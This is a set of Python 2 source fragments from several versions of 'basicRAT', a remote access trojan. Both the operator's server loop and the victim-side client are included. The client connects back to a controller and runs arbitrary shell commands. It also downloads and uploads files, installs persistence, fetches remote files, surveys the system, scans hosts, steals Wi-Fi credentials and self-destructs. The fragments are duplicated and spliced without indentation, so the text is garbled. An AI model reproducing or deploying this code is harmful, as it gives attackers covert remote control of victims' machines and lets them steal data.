def send(self, prompt):
if not self.alive:
print 'Error: Client not connected.'
return
# check for old output
readable, _, _ = select.select([self.conn], [], [], 0)
if readable:
print self.old_output(0)
# seperate prompt into command and action
cmd, _, action = prompt.partition(' ')
# selfdestruct rat
if cmd == 'selfdestruct':
if raw_input('Remove all traces of basicRAT from the target ' \
'system (y/N)? ').startswith('y'):
print 'Running selfdestruct...'
self.conn.send(encrypt(prompt, self.dhkey))
self.conn.close()
return
# send prompt to client
try:
self.conn.send(encrypt(prompt, self.dhkey))
except socket.error:
print 'Error: Could not connect to client.'
return
self.conn.settimeout(1)
# kill client connection
if cmd == 'kill':
self.conn.close()
if cmd == 'rekey':
self.dhkey = diffiehellman(self.conn)
# results of execute, persistence, scan, survey, unzip, wget, or stealwifi
if cmd in [
'cat', 'execute', 'ls', 'persistence', 'pwd', 'rekey', 'scan',
'survey', 'unzip', 'wget', 'stealwifi'
]:
print 'Running {}...'.format(cmd)
recv_data = decrypt(self.conn.recv(4096), self.dhkey)
print recv_data
def send(self, prompt, cmd, action):
if not self.alive:
print 'Error: Client not connected.'
return
# send prompt to client
crypto.sendGCM(self.conn, self.GCM, self.IV, prompt)
self.conn.settimeout(1)
self.IV += 1
# kill client connection
if cmd == 'kill':
self.conn.close()
# download a file
elif cmd == 'download':
for fname in action.split():
fname = fname.strip()
if os.path.isfile(fname):
print 'Error: File name already exists.'
return
filesock.recvfile(self.conn, self.GCM, fname)
# send file
elif cmd == 'upload':
for fname in action.split():
fname = fname.strip()
if not os.path.isfile(fname):
print 'Error: File not found.'
return
filesock.sendfile(self.conn, self.GCM, self.IV, fname)
# regenerate DH key
elif cmd == 'rekey':
self.dh_key = crypto.diffiehellman(self.conn, server=True)
# results of execute, persistence, scan, survey, unzip, or wget
elif cmd in [
'execute', 'persistence', 'scan', 'survey', 'unzip', 'wget'
]:
print 'Running {}...'.format(cmd)
recv_data = crypto.recvGCM(self.conn, self.GCM).rstrip()
print recv_data
def main():
parser = get_parser()
args = vars(parser.parse_args())
if args['version']:
print('basicRAT %s' % __version__)
return
host = args['ip']
port = args['port']
timeout = args['timeout']
exit_status = 0
while True:
conn = socket.socket()
try:
# attempt to connect to basicRAT server
conn.connect((host, port))
except socket.error:
time.sleep(timeout)
continue
dhkey = crypto.diffiehellman(conn)
# This try/except statement makes the client very resilient, but it's
# horrible for debugging. It will keep the client alive if the server
# is torn down unexpectedly, or if the client freaks out.
try:
exit_status = client_loop(conn, dhkey)
except:
pass
if exit_status:
sys.exit(0)
def main():
parser = get_parser()
args = vars(parser.parse_args())
port = args['port']
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(('0.0.0.0', port))
except socket.error:
print 'Error: Unable to start server, port {} in use?'.format(port)
sys.exit(1)
for line in BANNER.split('\n'):
time.sleep(0.05)
print line
print 'basicRAT server listening on port {}...'.format(port)
s.listen(10)
conn, addr = s.accept()
DHKEY = diffiehellman(conn, server=True)
while True:
prompt = raw_input('\n[{}] basicRAT> '.format(addr[0])).rstrip()
# allow noop
if not prompt:
continue
# seperate prompt into command and action
cmd, _, action = prompt.partition(' ')
# ensure command is valid before sending
if cmd not in COMMANDS:
print 'Invalid command, type "help" to see a list of commands.'
continue
# display help text
if cmd == 'help':
print HELP_TEXT
continue
# send data to client
conn.send(AES_encrypt(prompt, DHKEY))
# stop server
if cmd == 'quit':
s.close()
sys.exit(0)
# results of command
elif cmd == 'run':
recv_data = conn.recv(4096)
print AES_decrypt(recv_data, DHKEY).rstrip()
# download a file
elif cmd == 'download':
for fname in action.split():
fname = fname.strip()
recvfile(conn, fname, DHKEY)
# send file
elif cmd == 'upload':
for fname in action.split():
fname = fname.strip()
sendfile(conn, fname, DHKEY)
# regenerate DH key
elif cmd == 'rekey':
DHKEY = diffiehellman(conn, server=True)
# results of survey, persistence, unzip, or wget
elif cmd in ['scan', 'survey', 'persistence', 'unzip', 'wget']:
print 'Running {}...'.format(cmd)
recv_data = conn.recv(1024)
print AES_decrypt(recv_data, DHKEY)
def main():
s = socket.socket()
s.connect((HOST, PORT))
DHKEY = crypto.diffiehellman(s)
while True:
data = s.recv(1024)
data = crypto.AES_decrypt(data, DHKEY)
# seperate prompt into command and action
cmd, _, action = data.partition(' ')
# stop client
if cmd == 'quit':
s.close()
sys.exit(0)
# run command
elif cmd == 'run':
results = subprocess.Popen(action, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
s.sendall(crypto.AES_encrypt(results, DHKEY))
# send file
elif cmd == 'download':
for fname in action.split():
fname = fname.strip()
filesock.sendfile(s, fname, DHKEY)
# receive file
elif cmd == 'upload':
for fname in action.split():
fname = fname.strip()
filesock.recvfile(s, fname, DHKEY)
# regenerate DH key
elif cmd == 'rekey':
DHKEY = crypto.diffiehellman(s)
# apply persistence mechanism
elif cmd == 'persistence':
results = persistence.run(PLAT_TYPE)
s.send(crypto.AES_encrypt(results, DHKEY))
# download a file from the web
elif cmd == 'wget':
results = toolkit.wget(action)
s.send(crypto.AES_encrypt(results, DHKEY))
# unzip a file
elif cmd == 'unzip':
results = toolkit.unzip(action)
s.send(crypto.AES_encrypt(results, DHKEY))
# run system survey
elif cmd == 'survey':
results = survey.run(PLAT_TYPE)
s.send(crypto.AES_encrypt(results, DHKEY))
# run a scan
elif cmd == 'scan':
results = scan.single_host(action)
s.send(crypto.AES_encrypt(results, DHKEY))
def main():
s = socket.socket()
s.connect((HOST, PORT))
dh_key = crypto.diffiehellman(s)
GCM = crypto.AES_GCM(dh_key)
IV = 0
s.setblocking(0)
while True:
#data = s.recv(1024)
#data = crypto.AES_decrypt(data, dh_key)
data = crypto.recvGCM(s, GCM)
IV += 1
if not data:
continue
# seperate prompt into command and action
cmd, _, action = data.partition(' ')
# stop client
if cmd == 'kill':
s.close()
sys.exit(0)
# run command
elif cmd == 'execute':
results = subprocess.Popen(action,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
crypto.sendGCM(s, GCM, IV, results)
# send file
elif cmd == 'download':
for fname in action.split():
fname = fname.strip()
filesock.sendfile(s, GCM, fname)
# receive file
elif cmd == 'upload':
for fname in action.split():
fname = fname.strip()
filesock.recvfile(s, GCM, IV, fname)
# regenerate DH key
elif cmd == 'rekey':
dh_key = crypto.diffiehellman(s)
# apply persistence mechanism
elif cmd == 'persistence':
results = persistence.run(PLAT_TYPE)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# download a file from the web
elif cmd == 'wget':
results = toolkit.wget(action)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# unzip a file
elif cmd == 'unzip':
results = toolkit.unzip(action)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# run system survey
elif cmd == 'survey':
results = survey.run(PLAT_TYPE)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# run a scan
elif cmd == 'scan':
results = scan.single_host(action)
crypto.sendGCM(s, GCM, IV, results)
